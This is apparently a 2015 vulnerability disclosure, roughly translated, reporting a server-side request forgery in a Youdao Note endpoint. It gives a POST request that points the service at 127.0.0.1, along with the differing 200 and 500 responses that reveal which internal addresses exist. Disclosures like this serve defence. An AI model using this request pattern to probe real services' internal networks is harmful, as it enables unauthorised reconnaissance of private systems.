Netease SSRF can detect the Intranet
Vulnerability URL: http://note.youdao.com/memory? Url = http://www.wooyun.org (register for login if you need)
Where the body is previewed
<meta name="description" content=""/>
Content as a display
Track the jump of a webpage
POST /yws/open/memory?method=content HTTP/1.1Host: note.youdao.comProxy-Connection: keep-aliveContent-Length: 20Accept: application/json, text/javascript, */*Origin: http://note.youdao.comX-Requested-With: XMLHttpRequestCookie: url=http://127.0.0.1
(The parameters have been reduced. Please capture packets by yourself)
The unattainable result based on the URL address is similar to the following:
Arrival:
HTTP/1.1 200 OKServer: TengineDate: Wed, 14 Jan 2015 15:38:44 GMTContent-Type: text/json; charset=UTF-8Content-Length: 41Connection: closePragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: Thu, 01 Jan 1970 00:00:00 GMTContent-Language: zh-CNCache-Control: no-cache{"content":"","title":null,"type":"NONE"}
(For example, content is displayed on the content Intranet. If no content exists and no address exists, you can test www.wooyun.org -- with content www.baidu.com -- without content)
If not:
HTTP/1.1 500 Internal Server ErrorServer: TengineDate: Thu, 15 Jan 2015 00:57:34 GMTContent-Type: text/json; charset=UTF-8Content-Length: 157Connection: closeRES-CODE: 213Pragma: no-cacheCache-Control: no-cache, no-store, must-revalidateExpires: Thu, 01 Jan 1970 00:00:00 GMTContent-Language: zh-CN{"message":"Message[DATA_TRANSMISSION_FAILURE]: Page Clipper Exception, URL=http://127.0.0.1","canTryAgain":false,"scope":"PREVIOUS_EXCEPTION","error":"213"}
Solution:
Filtering and Restriction